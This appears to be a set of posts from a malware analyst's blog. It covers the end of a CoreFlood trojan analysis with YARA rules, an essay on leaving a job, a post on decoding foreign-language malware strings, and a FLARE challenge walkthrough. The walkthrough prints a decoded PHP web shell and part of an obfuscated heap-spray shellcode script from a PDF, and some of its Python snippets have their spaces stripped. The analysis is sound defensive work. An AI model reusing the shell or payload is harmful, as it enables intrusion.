        comment = "CoreFlood Trojan Loader Strings"

    strings:
        $RegKey = "MlLrqtuhA3x0WmjwNM27"
        $API = "3etProcAddr"

    condition:
        all of them
}

rule CoreFlood_ldr_decoder
{
    meta:
        author = "Brian Baskin"
        date = "13 Feb 14"
        comment = "CoreFlood? Trojan Loader Decoding Keys"

    strings:
        $Sub_85BA = { 81 EA BA 85 00 00 }
        $XOR_85BC = { 05 BC 85 00 00 }

    condition:
        all of them
}

At this point, we would want to test these rules across multiple files to ensure that there are no false positives, and that they do hit on variants. This is best performed against a large-scale internal malware database, such as the one provided by VXShare.
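A quick way to run that test is with the yara-python bindings; a minimal sketch (the rule file name and corpus path are hypothetical):

import os
import yara

rules = yara.compile('coreflood_ldr.yar')          # hypothetical rule file
for root, dirs, files in os.walk(r'D:\corpus'):    # hypothetical sample corpus
    for name in files:
        path = os.path.join(root, name)
        for match in rules.match(path):
            print "%s => %s" % (path, match.rule)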


Looking for hardcoded network traffic will also help us write signatures for Snort or other IDSs. For example, in static analysis, we found the initial HTTP POST traffic sent using a hardcoded user agent of "User-Agent: Opera/10.80 Pesto/2.2.30". This could easily be used to create a signature, after performing a bit of research to determine the commonality of it.

Anything Else?


With the questions answered and rules written, there is a lot of functionality within the trojan that was not analyzed. This was a 1-hour targeted static analysis, so many things were skipped over, or just guessed at. Had this been a proper deep dive (3-4 days), we would have every function properly named and all runtime trees documented.


The name here is a bit of an issue. Why is it called CoreFlood? That's what the AV companies called it. However, you don't have to follow their naming conventions for your own malware databases (and many people don't). Based on data presented by the Trojan, the two names that come to mind as possibly given by its author are 'mmc' and 'shed'. The update routine of 'mmc_install' is prominent, but so are the 'shedexec', 'shedscr', and 'delshed' configuration settings. The 'thr1' name was also interesting, but at a lower level; it's possibly a campaign identifier or an actor's initials or signature.

A cursory analysis showed time-based logic in execution. For example, the sample appears to be set to not run before 15 Dec 2010. It will also check the creation time of a local file named Adobe.cer and compare the date against that.

The sample has cursory anti-analysis techniques, comparing a list of text strings against the names of all running processes. That list was composed of:

Wireshar;ommView;HTTP Analyz;TracePlus32;Network Analyz;HTTP Snif;Fiddler;

If this sample was giving issues with dynamic analysis tools, you could easily decode this string, modify it, re-encode it and place it back into the executable.

Why does the sample download the mmc%d.exe file and check whether its file size is less than 3000?

What does the number "3" mean in front of the URL?

Is there a C2 command structure?

We'll note those questions for later analysis or present them to a client to determine if they're worth spending the time and money to answer.

Moving On to New Career Opportunities

In the next few days I will be moving on from my current work and into a new and exciting opportunity. As I worked through this effort, while writing a book and preparing con talks, I started to think of the practical and emotional tasks needed to ensure that my current employer and clients are taken care of while I prepare for the future.

In this effort, I wanted to pass on a few ideas that may help others.

Personal Side


To begin with, let's discuss the personal side to the move. I've been working with the Defense Cyber Crime Center (DC3) for almost 14 years. I've been with them since before they were even named DC3, and were just the Defense Computer Forensics Lab (DCFL) and the Defense Cyber Investigations Training Program (DCITP a.k.a. The 'TIP). Also, since we had "Cyber" in our agency name since the late 90's, I'm fully allowed to use it in regular conversation without drinks.

I said goodbye to DC3 once before, temporarily, when I moved on from being the Deputy Technical Lead of the Training Academy. I left under the weight of a serious case of burnout (i.e. with medical intervention) after helping lead development of 20+ technical courses, managing my own technical team, and being a technical lead and presenter on a large contract re-compete... while helping write a book. I needed a break, and getting into the down and dirty of regular forensic cases was the fix.

I joined my good friends Eoghan Casey, Terrance Maguire, and Chris Daywalt in their venture, cmdLabs, as employee #1. We worked awesome incident response cases together and delved into research projects and code development. Around that time, cmdLabs was acquired by Newberry Group, run by a CEO and VP whom I had known for over a decade. Life was good and, after a cool-down period, I went back into DC3 on a separate contract to work on their Intrusions team.


In Intrusions I was thrown to the wolves, having to learn everything from scratch to become one of their malware reverse engineers. Within a few months I was writing automated decryptors for custom encryption, and after a few years was running the gamut of malware, file systems, log analysis and PCAPs as a senior member of the team.

However, all good things do come to an end. The opportunity arose from an old friend to work on the RSA NetWitness team, which I will be joining next week. This is an excellent chance to do my favorite things: incident response, forensics, malware analysis, and threat intel, in a very challenging environment with coworkers I respect as my technical seniors. I was getting too long in the tooth at DCFL, becoming too much a senior person, and wanted to be back in an environment where I'm struggling every day to keep up.

I missed the incident response work and was reaching a point where my rapid rate of learning was tapering off. I needed a more challenging venue and wanted to be more involved in industry-wide collaboration, and not stuck working in the information vacuum of a SCIF.

Deciding to leave was not easy; it was extremely stressful and nerve wracking. I love my company and their environment, and greatly enjoyed the casework that I was exposed to at DCFL. There will always be that shred of regret when you leave something you love, but new opportunities beckon. Even after parting, I continue to assist my peers at Newberry Group and DCFL; their teams are just that amazing.

Technical Side

Let's discuss some of the efforts and decisions that go into making a move such as this. Some are my personal opinions as to leaving a job, and some are good advice for others to consider.

Communication

First, are you sure you want to quit? Most issues in a disgruntled resignation can be easily resolved simply by communication. If you reach the point where you want to leave your job, talk to someone before you accept any hard offer.

It's definitely worthwhile to interview elsewhere, to see other opportunities and where you stand. This can help you go back to your management to demonstrate what other companies are doing, and what they're paying for talent. In my own recent travels, I encountered a grueling 6-hour on-site technical interview and a 12-hour at-home technical interview. These were especially helpful in pinpointing my weaknesses and strengths, making me realize that there were some jobs I loved but wasn't ready for, and that these were skills my current job could train me in if I gave it a chance.

Is it salary? Or a bad work environment? Those things can likely be solved, but only if they are brought to the attention of management. Many organizations will quickly fork over bonuses and increased salary to keep a star employee around, especially in contract work. Some work environments can be resolved by allowing you to work from home twice a week, shifting your work hours, or moving personnel around. Again, it's only possible if it's communicated.

The best thing you can do is request a meeting and simply say "I'm thinking about leaving, and here are my reasons why."

For many years, I commuted an hour each way. The stress of this was slowly taking a toll on my physical and mental state. I would dread my drive every day, and ended up listing my house for sale to move closer. However, after months on a bad market, I gave up on selling it. I raised the issue to my boss: "I just can't do it anymore. I'm stuck, I'm miserable, and I don't see a way out." They saw a way out and offered a creative compromise that finally allowed me to move closer to my job.

I raised an issue, they felt it worth keeping me around, and we worked out a solution together.

Timing

Do you need to quit right now? There are sometimes extenuating circumstances that require that, other times it's your choice. Maintain a good relationship with your employer and clients and monitor the workload. If you leave during a critical incident, or a heavy period of assignments, you place a heavy burden on your coworkers. They may never forget that.



My advice: Tell your boss that you're leaving but that you're worried about what would happen in your wake. Agree to work through a crunch period, or a period for them to retrain another employee, before leaving.

And, most controversially, don't give two weeks notice. That's completely unrealistic in our industry. The current trend in most of the working world is to give zero notice, but that is generally directed to employees with little skill.

The more responsibility you have, the greater your notice should be. And the digital forensics and incident response field is a buyer's market. There are not enough candidates to fill the jobs, and it's extremely likely that a candidate would not be found within two weeks. Additionally, if you are contracted to a client site, your company may face the permanent loss of work or positions if they are unable to back-fill your position quickly after your departure.

If you've been in the industry long enough, you realize just how small it is. I still occasionally interact professionally with people I've worked for over a decade ago. In forensics, your work is based upon your character. The adage of burned bridges is definitely true and will haunt you.

Additionally, the work we do doesn't lend itself to just walking away. If you're in the middle of a large-scale incident response, you need to properly fill in your replacement with the client's details, current state of the operation, and what should be focused upon. Likewise with a criminal or forensic examination, where you may be asked to testify one day (even after you quit). If you walk out too quickly, you risk your organization having to redo the entire investigation from scratch, which will not make anyone happy.

Four weeks' notice should be the standard for our industry, in my opinion. If in doubt, which you should be, have a conversation with your management about what an appropriate amount of time would be. If they prefer to have you leave within the hour, then know that they were looking to get rid of you for a while... Again, communication is the key.

Brain Dump

Dilbert.com

In your final days, you're finishing up your examinations and preparing for the end. If you're lucky, you'll be placed in a state where you're not given more forensic examinations to perform. However, expect to be working up to the bitter end. 

In a good environment, instead of giving you new and difficult work, management will assign it to others and have you mentor that person through the process. This will afford you time to work on the truly important tasks: information sharing.

The single most important thing to accomplish before leaving is to capture any knowledge you have so that others can use it. Each person on a team has their own specializations, and it may be impossible to hire a direct replacement that can perform the same tasks as you. Therefore, being able to identify and document these tasks will help keep your old team performing even in your absence.

YARA rules are one direct way of transferring knowledge. Once you've been in the industry long enough, you acquire a second-sense about malicious indicators; seeing specific domain names, file names, or registry keys will instantly set off a red flag of where you should look next to find indicators of the attack. For example, part of my leaving has me correlating and documenting six years of webshells into YARA rules. It's taking my own personal passion, tying it into a larger effort, and helping future examiners receive instant correlation. Also, it only took 4 hours of concerted effort, so there's not many excuses NOT to do this.

Additionally, if your team has an internal wiki, make sure that everything you've done has been documented in great detail. If you've presented any internal Technical Exchanges make sure that the pages are updated with step-by-step procedures and with the latest software.

Examine any half-written scripts that you've been tinkering with. Spend an hour cleaning them up, documenting them, and adding basic usage text to help others months down the road. There is nothing worse, as a user, than running a script and receiving:

Traceback (most recent call last):
File "Z:\Malware\Scripts\Baskin\AwesomeCoolDecoder.py", line 202, in <module>
filename = sys.argv[1]
IndexError: list index out of range
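A couple of lines of argument checking go a long way. A minimal sketch of the kind of usage text that prevents the traceback above (the script and argument names are illustrative):

import sys

if len(sys.argv) < 2:
    print "Usage: AwesomeCoolDecoder.py <encoded file>"
    print "  Decodes an encoded blob and prints the result to stdout"
    sys.exit(1)

filename = sys.argv[1]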


Identify any key task that you've taken upon yourself and notify others of it. We all have hidden jobs that no one knows about. These could include cleaning up certain network shares, maintaining naming structures in the internal Wiki, escorting visitors through an area, sitting in on an annual meeting, or updating the software available to the team. These are the little things that will cause mass confusion in the weeks ahead, often because no one realized that you were doing the work in the first place, and will be surprised that it's not just magically done Monday morning. This is also one last bit of performance measurement that you can provide to strengthen the bridge for any future professional work.

I admit that this may be viewed as giving up your competitive edge, your job security: disclosing private, technical solutions to coworkers. I would counter with the fact that you are more than just a laundry list of technical items. Your value lies in the ability to function without a list provided by others, to do so quickly and efficiently, and to document your actions for others. In other words, being a technical leader and not a follower. Even if you consider yourself a mere follower, the steps laid out here can help mold you into a leader to those around you.

But wait! There's more!

I received some great feedback and ideas for other items to include here, such as how you would integrate quickly into a new team. There are some great points for me to bring up, which I'll pen to paper soon. I'll also add some new perspective on that when I do start a new team on Monday. So, come back and visit this post again soon; there'll be more :)

Mojibaked Malware: Reading Strings Like Tarot Cards

One notable side effect to working in intrusions and malware analysis is the common and frustrating exposure to text in a foreign language. While many would argue the world was much better when text fit within a one-byte space, dwindling RAM and hard drive costs allowed us the extravagant expense of using TWO bytes to represent each character. The world has yet to recover from the shock of this great invention and modern programmers cry themselves to sleep while fighting with Unicode strings.

For a malware analyst, this typically comes about while analyzing code that's beyond the standard trojan, which typically contains no output. Analyzing C2 clients (servers, in other contexts) and decoy documents requires being able to identify the correct code page for strings so that they appear correctly, can be attributed to a language, and can then be translated.

ASCII characters occupy a single byte of storage (strictly the values 0-127, with various 8-bit extensions filling out 0-255). UTF-8 extends upon this by using a single byte where possible, but also allowing multi-byte sequences for characters outside that range. If you see a string of text that looks like ASCII, but then randomly contains unknown characters, it is likely UTF-8, such as:

C:\users\brian\樿鱼\malware.pdb

Code pages, UTF-16, and even UTF-32, provide additional challenges by providing little context to the data involved. However, I hope that by this point in 2013 we don't need to continually harp on what Unicode is...

For most analysts, their exposure to Unicode is being confronted with unknown text, and then trying to figure out how to get it back into its original language. This text, when illegible, is known as mojibake, a Japanese term for "writing that changes". The data is correct, and it does mean something to someone, but the wrong encoding is being applied. This results in text that looks, well... wrong.

Most analysts have gotten into the habit of searching for unknown characters then guessing which code page or encoding to apply until they produce something that looks legible. This does eventually work, but is a clumsy science. We all have our favorites to try: GB2312, Big5, Cyrillic, 8859-2, etc. But, let's just keep this short and sweet and show you a tool that your peers likely already know about but forgot to show you.
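For bytes carved out of a file, that guess-and-check loop looks something like the sketch below. The byte values are my reconstruction of the UTF-8 encoding of the folder name in the path shown above, and the codec list is just a starting point:

raw = '\xe6\xa8\xbf\xe9\xb1\xbc'   # the unknown bytes between "brian\" and "\malware.pdb"
for codec in ['utf-8', 'gb2312', 'big5', 'cp1251', 'iso-8859-2', 'shift_jis']:
    try:
        print codec, raw.decode(codec)
    except (UnicodeError, LookupError):
        print codec, "(failed)"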



Many times unknown data is found directly in the middle of known text, such as:

C:\users\brian\樿鱼\malware.pdb

That small section of unknown data in the middle is mojibake. The problem you'll find is that if this string of text is stored within a binary file, such as an executable, using a tool like 'strings' will miss it. 'strings' will instead return two strings: "C:\users\brian\" and "malware.pdb", completely missing the folder name that's UTF-8 Chinese. 

My preferred method for dealing with these is to simply paste the string into Notepad++. It can natively translate to UTF-8 or various code pages on the fly. Just make sure that you're in ANSI mode when you paste it in.

For graphical applications it's a bit more difficult. Take, for instance, these series of texts from a malware C2 client:


This is mojibake. The standard way that most people get around this issue is to identify the code page from the application, usually by using an application like ExifTool, setting their system to use that language pack as the primary, then rebooting and running the application again. This works, but is cumbersome. Others take VM snapshots of their analysis system in various languages, then just revert to the appropriate language to extract the language strings as needed.

The problem deepens when an application has a mixture of correct strings alongside mojibake strings, such as this program does:


The proper strings are the result of the program containing a String/Dialog resource with appropriate language settings applied. This program, viewed with Cerbero's PEInsider, showed Menus and Dialogs with proper settings applied (2052 - Chinese Simplified):


However, for its string table, the application features virtually no entries at all: just strings of "A" and "B".



This provides part of the picture, but doesn't encompass all of the strings we may run across, especially for those created dynamically at runtime.

The preferred way is to use a little-known, but also widely-known, Microsoft tool named AppLocale. AppLocale will run an application in a specific, chosen code page and provide native translation. All that is required is for you to have the appropriate language pack installed, without having to make it the OS's primary language.

However, there are multiple issues with AppLocale. It's a GUI loader that displays the supported languages in their native written format, as shown below, making it impossible to know which is which unless you already know the language.


Good luck with that. Especially when you jump between eight languages in a given week.

AppLocale does allow for command-line execution, but requires you to know a specific four-digit number based on Microsoft's Locale IDs, which are relatively unknown to outsiders. For instance, for Simplified Chinese it expects the hexadecimal Locale ID 0804 instead of the universally known decimal 2052 (0x0804 and 2052 are the same value).

To simplify the process, I threw together a quick script over the weekend that provided the full selection of Locale IDs, from which one is selected. It then creates a new option on the right-click context menu for executable files. That's it, nothing major.

The effect is instantaneous though. Edit the script and uncomment the language of your choice, then run the script as an account with administrative access. From there, you can simply right click on any executable and select "Execute with AppLocale". The applications should then show up in their native language without any reboots, like our text below from the earlier C2 client:


Note: If instead of the program running, AppLocale gives you a setup window, then you likely do not have that specified language pack installed.

Software:
Microsoft AppLocale: http://www.microsoft.com/en-us/download/details.aspx?id=13209
RightClick_AppLocale: https://github.com/Rurik/RightClick_AppLocale/blob/master/RCAppLocale.py



Further Fun Reading:
Do You Want Coffee with That Mojibake?  http://iphone.sys-con.com/node/44480
Unicode Search of Dirty Data, Or: How I Learned to Stop Worrying and Love Unicode Technical Standard #18  Slide Deck (PDF)  |  White Paper
Russian Post Office fixes mojibake on the fly  http://en.wikipedia.org/wiki/File:Letter_to_Russia_with_krokozyabry.jpg

A Walkthrough for FLARE RE Challenges



The FireEye Labs Advanced Reverse Engineering (FLARE) challenge caused a bit of a buzz when it was announced and launched in early July. It read like a recruitment campaign for a new division within FireEye, but it was still a fun challenge to partake in. Then the challenge started ... and I was on-site with a client for the week and forgot all about it.

Busy under the pressure of releasing the new Dissecting the Hack book, I pushed the challenge to the back of my mind until the 24th of July. I was facing a pretty hard-hitting bit of writer's block and frustration, so I agreed to let myself have a break to do the challenge for one week before getting back to my commitments.

After the challenge finished, and answers and methods started floating around, I realized that many of my tactics were completely different from others'. I'm sure that's to be expected in this field; many of my methods come from working in an environment without Internet access and without an expert on call for answers. I'm also fully from a forensics background (hex editors, data structures, file parsers, etc.) and work in commercial incident response with RSA, so I was bound to tackle problems differently from someone with a pentesting or vuln discovery background.

Although the challenge started in early July, it ran up until 15 September. There was an unspoken moratorium on answers/solutions while the challenge ran, but now that the samples are all freely available from their website, some are coming forth with how they completed them.

This is my story.


Challenge 1


The first challenge started out with downloading an executable from the flare-on.com website. I immediately threw it into IDA and started poking around, only to discover that it was just a dropper for the real challenge :)  I let it do its thing, agreed to a EULA without reading it, and received the first challenge file:

File Name       : Challenge1.exe
File Size : 120,832 bytes
MD5 : 66692c39aab3f8e7979b43f2a31c104f
SHA1 : 5f7d1552383dc9de18758aa29c6b7e21ca172634
Fuzzy : 3072:vaL7nzo5UC2ShGACS3XzXl/ZPYHLy7argeZX:uUUC2SHjpurG
Import Hash : f34d5f2d4577ed6d9ceec516c1f5a744
Compiled Time : Wed Jul 02 19:01:33 2014 UTC
PE Sections (3) : Name Size MD5
.text 118,272 e4c64d5b55603ecef3562099317cad76
.rsrc 1,536 6adbd3818087d9be58766dccc3f5f2bd
.reloc 512 34db3eafce34815286f13c2ea0e2da70
Magic : PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
.NET Version : 2.0.0.0
SignSrch : offset num description [bits.endian.size]
0040df85 2875 libavcodec ff_mjpeg_val_ac_luminance [..162]
0040e05d 2876 libavcodec ff_mjpeg_val_ac_chrominance [..162]


Based on this output, I can see first of all that it was built on .NET 2.0 (based on the mscorlib import). That'll be important later for deciding which tool to analyze the file in; IDA Pro is not the most conducive tool for .NET applications.

At this point, let's run it and see what happens:



The image shows some happy little trees and a great, big "DECODE" button. Clicking this button changes the image thusly:



Without any clue of what to do with the challenge, or what I'm actually looking for, I open it up for analysis with Red Gate .NET Reflector.


Typically with static analysis on an unknown file, I start from main() and work down. The equivalent is seen here with InitializeComponent():


Notably, I see the decode button being drawn on the screen with button.text = "DECODE"; and a subroutine applied to this button with button.Click += new EventHandler(this.btnDecode_Click); My clue here is to hunt for this routine, btnDecode_Click, which shows:



Math is a good sign. Looking at this, I see three distinct string encoding routines, each producing their own string variable. The first is a definite byte-by-byte encoding, the second appears to be a byte-swap, and the third is a simple XOR. This final value is then applied to the this.lbl_title.Text.

From here, the easiest route was to simply copy the binary data out (Resources.dat_secret) and replicate the routines in Python:


data="\xA1\xB5\x44\x84\x14\xE4\xA1\xB5\xD4\x70\xB4\x91\xB4\x70\xD4\x91\xE4\xC4\x96\xF4\x54\x84\xB5\xC4\x40\x64\x74\x70\xA4\x64\x44"
printdata
foriindata:
str+=chr(((ord(i)>>4)|(ord(i)<<4)&240)^0x29)
printstr
forjinrange(0,len(str),2):
str2+=str[j+1]+str[j]
printstr2
forkinstr2:
str3+=chr(ord(k)^0x66)
printstr3


This resulted in the output of:

╡Dä¶Σí╡╘p┤æ┤p╘æΣ─û⌠Tä╡─@dtpñdD
3rmahg3rd.b0b.d0ge@flare-on.com
r3amghr3.d0b.b0degf@alero-.noc m

The first round of encoding resulted in an email address. Cool!  I poked around for a bit more and found no additional functionality... so... I email the address? Sent on 24 Jul 14 at 2123:


30 seconds later I receive an automated email with the second challenge. Oh, so that's how these are played :)



Challenge 2


Challenge 2 consisted of a ZIP with an HTML and a PNG image:

Path = C2.zip
Type = zip
Physical Size = 10758

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2014-07-07 22:22:33 ....A 8375 2857 home.html
2014-07-07 21:30:25 D.... 0 0 img
2014-07-07 21:30:47 ....A 9560 7430 img\flare-on.png
------------------- ----- ------------ ------------ ------------------------
17935 10287 2 files, 1 folders

Looking at the HTML showed that it was a mirror of the flare-on.com web page with no obvious issues. However, it did reference the PNG:



I tried to view the PNG and received an error:



Opening it up in a hex editor (and then a text editor) showed that there was no picture data, just a set of PHP code. I was actually disappointed by this. I was hoping it'd be PHP appended to a PNG to at least confuse the newbies, but this was very apparent.



The PHP code was a basic text obfuscation routine where two arrays were created to build new code. One array contained an alphabet of all possible characters used ($terms) and the second contained the actual sequence of the output data ($order). I copy/pasted the tables into a thrown-together Python script:

terms=["M","Z","]","p","\\","w","f","1","v","<","a","Q","z","","s","m","+","E","D","g","W","\"","q","y","T","V","n","S","X",")","9","C","P","r","&","\'","!","x","G",":","2","~","O","h","u","U","@",";","H","3","F","6","b","L",">","^",",",".","l","$","d","`","%","N","*","[","0","}","J","-","5","_","A","=","{","k","o","7","#","i","I","Y","(","j","/","?","K","c","B","t","R","4","8","e","|"]
code=[59,71,73,13,35,10,20,81,76,10,28,63,12,1,28,11,76,68,50,30,11,24,7,63,45,20,23,68,87,42,24,60,87,63,18,58,87,63,18,58,87,63,
...
...
4,7,91,91,4,37,51,70,21,47,93,8,10,58,82,59,71,71,71,82,59,71,71,29,29,47]

data=''
foriincode:
data+=terms[i]
printdata

Running this produced a second PHP script (carriage returns added for clarity):


$_='aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9';
$__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';
$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
eval($___($__));

Looking at the big block of data suggests that it is Base64, just based on its appearance. We see it executed by the obfuscated string of $___ which is a weird mixture of octal and hex bytes. By running that string through an online interpreter, we see that it is simply base64_decode:
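If you'd rather not rely on an online interpreter, the same check can be done locally. A small sketch that expands both the \xNN (hex) and \NNN (octal) escapes:

import re

s = r"\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"
out = ''
# PHP allows hex (\xNN) and octal (\NNN) escapes side by side; handle both forms
for hex_part, oct_part in re.findall(r"\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})", s):
    out += chr(int(hex_part, 16)) if hex_part else chr(int(oct_part, 8))
print out   # -> base64_decode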


First we Base64 decode the small block of data in $__ to receive:

$code=base64_decode($_);eval($code);

No surprises here. Now, the big block of data:

$_=if(isset($_POST["\\97\\49\\49\\68\\x4F\\84\\116\\x68\\97\\x74\\x44\\x4F\\x54\\x6A\\97\\x76\\x61\\x35\\x63\\x72\\97\\x70\\x41\\84\\x66\\x6C\\97\\x72\\x65\\x44\\65\\x53\\72\\111\\110\\68\\79\\84\\99\\x6F\\x6D"]))
{
eval(base64_decode($_POST["\\97\\49\\x31\\68\\x4F\\x54\\116\\104\\x61\\116\\x44\\79\\x54\\106\\97\\118\\97\\53\\x63\\114\\x61\\x70\\65\\84\\102\\x6C\\x61\\114\\101\\x44\\65\\x53\\72\\111\\x6E\\x44\\x4F\\84\\99\\x6F\\x6D"]));
};

At this point, PHP is looking to see if an HTTP POST field holds a value and, if so, evals the Base64-decoded version of it, like a very simple web shell. One issue is that the online interpreter doesn't like the double slashes, but that's an easy fix. Also note that the escapes without an 'x' aren't octal values here but ASCII decimal values for characters. Unsure of how to print those easily, I threw together a quick script to decode them:


data=r"\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D"

result=''
items=data.split('\\')
foriinitems:
ifi:
ifi[0]=='x':result+=chr(int(i[1:3],16))
else:result+=chr(int(i))
printresult

Running this produced:

a11DOTthatDOTjava5crapATflareDASHonDOTcom (or: a11.that.java5crap@flare-on.com)

This was a pretty easy one that was done in 15 minutes. The email was shot off on 24 July 14 at 2138 and I received #3 immediately after.



Challenge 3


Challenge 3 was a simple, tiny executable named such_evil:

File Name       : such_evil
File Size : 7,168 bytes
MD5 : f015b845c2f85cd23271bc0babf2e963
SHA1 : f5d527908f363f6b1efad684532bf544a2d077ac
Fuzzy : 96:FcVTXrxJsuqISnUitUlGTw9u6Q0H5TrgCV5E/a/mtVox:F4XMuqIitbAH5TP5kEOox
Import Hash : 50f433a443bc36990996bb4d4dd484aa
Compiled Time : Thu Jan 01 00:00:00 1970 UTC
PE Sections (2) : Name Size MD5
.text 6,144 a75c2e2daad859328d31827f1318efd8
.data 512 f553d080b0d5ee70296bfd5aef252b79
Magic : PE32 executable for MS Windows (console) Intel 80386 32-bit

Running the executable showed an alert error:



Opening it up with IDA Pro showed that static analysis alone wouldn't get far. There is simply a large routine that writes new shellcode to memory, one byte at a time, and then calls it.




I dumped IDA and switched over to Immunity Debugger. I find its debugger much easier to use than IDA's (the latter of which I'm slowly learning to use).

Following the code shows that it begins writing the shellcode to memory at EBP-0x201. I went to that memory space, nulled it, and monitored the writing:



Once the data was all written, it simply LEA's EBP-0x201 into EAX, and CALL EAX:



Early on in this new routine, there is a FOR loop that XOR's data by 0x66. It decodes from that point in the shellcode forward through the remainder of the data, with an apparent string appearing at the beginning:

"and so it begins"



Additional text is also seen here: hus\00, hsaurhnopa. If you read shellcode, these are pushes (0x68, the "h") of a string onto the stack in four-byte segments, and in the next part of the code we see that's exactly what happens. The string ends up becoming the XOR key for the next round of decoding: "nopasaurus"

After decoding we see another block: "get ready to get nop'ed so damn hard in the paint".  The paint? The pain? The ... I don't know.



More decoding, this time by a hardcoded XOR string of Gl0b (0x624F6C47, read little-endian). Then an XOR by "omg is it almost over?!?" which results in ... an email address:



However, there's more code! By following the rest, we see that the next block contains the error alert window that was shown at the very beginning.

14 minutes after starting, an email was fired off to such.5h311010101@flare-on.com on 24 July 14 at 2152.



Challenge 4



Things are starting to pick up now. Challenge 4 is a PDF named "APT9001.pdf". The name is obviously a spoof on the APT1 report, and I started to wonder if there was a key in it. Like it's using Trojan 9002 ... minus one?

File Name       : APT9001.pdf
File Size : 21,284 bytes
MD5 : f2bf6b87b5ab15a1889bddbe0be0903f
SHA1 : 58c93841ee644a5d2f5062bb755c6b9477ec6c0b
Fuzzy : 384:y58K1Qdl6W739kGHQN3kiAJdounFkltXw7iYR4hr3h9ihFjhVJVX5g/zd9Gq:F9gWtHQDyFyC7+d32jHX5y
Magic : PDF document, version 1.5

The file is obviously a PDF, with an older format. For a quick triage I used PDFStreamDumper, a GUI tool for PDF analysis that I often try not to use (it's no PDFubar). It failed to show any data from the PDF. Using the generic encryption brute forcer, the file opened to display some objects, but not the ones we really care about.

Using Didier Stevens's pdf-parser showed some items of interest:

brians-mbp:Tools bbaskin$ ./pdf-parser.py  ~/FLARE/4/APT9001.pdf
PDF Comment '%PDF-1.5\r\n'

PDF Comment '%\xea\xbb\xc1\x9c\r\n'

obj 1 0
Type: /Catalog
Referencing: 2 0 R, 3 0 R, 5 0 R

<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 5 0 R

>>



obj 5 0
Type: /Action
Referencing: 6 0 R

<<
/Type /Action
/S /JavaScript
/JS 6 0 R
>>


obj 6 0
Type:
Referencing:
Contains stream

<<
/Length 6170
/Filter '[ \r\n /Fla#74eDe#63o#64#65 /AS#43IIHexD#65cod#65 ]'

>>



Notably, Object 5 (obj 5 0) is an action page that loads JavaScript from object 6 (/JS 6 0 R). So, we divert our attention to object 6 and see that the stream is encoded and its filter names obfuscated. In each name, assorted characters are replaced with their hex values (#XX), but a visual pass shows they read "FlateDecode" and "ASCIIHexDecode".
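Resolving those #XX escapes is a one-liner if you want to script it; a quick sketch using the names from this object:

import re

name = "/Fla#74eDe#63o#64#65 /AS#43IIHexD#65cod#65"
# replace each #XX escape with the character it encodes
print re.sub(r"#([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), name)
# -> /FlateDecode /ASCIIHexDecode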

Targeting this object with pdf-parser dumps a block of JavaScript data that we need to work with:

brians-mbp:Tools bbaskin$ ./pdf-parser.py  ~/FLARE/4/APT9001.pdf -o 6 -f
obj 6 0
Type:
Referencing:
Contains stream

<<
/Length 6170
/Filter '[ \r\n /Fla#74eDe#63o#64#65 /AS#43IIHexD#65cod#65 ]'
>>

'var HdPN = "";
var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4

.. removed for brevity ..

%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";

for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=128;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA>=0;--EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791");
ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;
fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS+ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length
while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length ...
bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20
while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT);
